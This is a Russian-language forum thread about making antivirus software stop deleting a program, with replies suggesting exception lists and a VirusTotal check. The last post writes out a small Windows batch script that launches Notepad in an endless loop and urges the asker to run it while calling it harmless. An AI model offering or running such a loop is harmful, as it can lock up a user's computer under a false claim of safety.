|
Udav
|
|
 Ранг: Член сообщества Группа: Участник
|
Подскажите антивирус, который можно как-то сделать не злобным к существующей программе. Все что я попробовал ее убивают. А без антика как-то боязно.
|
|
Семен Семеныч Горбунков
|
|
Ранг: Кандидат Группа: Регистрация на форуме
|
В настройках любого антивируса есть так называемый "белый список" он же список исключений. указываешь там путь к проге и все ок. п.с а что за программа то?
|
|
Ёж
|
|
|
Udav сообщал(а):Подскажите антивирус, который можно как-то сделать не злобным к существующей программе. Все что я попробовал ее убивают.  А без антика как-то боязно. вас не смущает, что несколько антивирусов считают какой то код вредоносным? попробуйте загрузить файл сюда: https://www.virustotal.com/ru/, посмотрите что про него пишут.
"По характеру люди делятся на тех, кто наделен быстрым разумом, и на тех, кто прежде, чем принять решение, должен уединиться и все обдумать."(с) Хагакурэ, 18 век.
|
|
Udav
|
|
|
Не знаю. Старый Avast и Каспер нормально относились. Но это было давно.
|
|
Ёж
|
|
|
Udav сообщал(а):Не знаю. Старый Avast и Каспер нормально относились. Но это было давно. ага. нормально. проведем прикладной эксперимент? откройте в виндовс блокнот и вставьте этот текст:
@echo off :a start notepad goto a
нажмите "файл", "сохранить" тип файла - "все файлы", название - выполнить.bat "сохранить" закрываете. запускаете. никаких вирусов, просто три примитивные команды.
"По характеру люди делятся на тех, кто наделен быстрым разумом, и на тех, кто прежде, чем принять решение, должен уединиться и все обдумать."(с) Хагакурэ, 18 век.
|
|
Guest |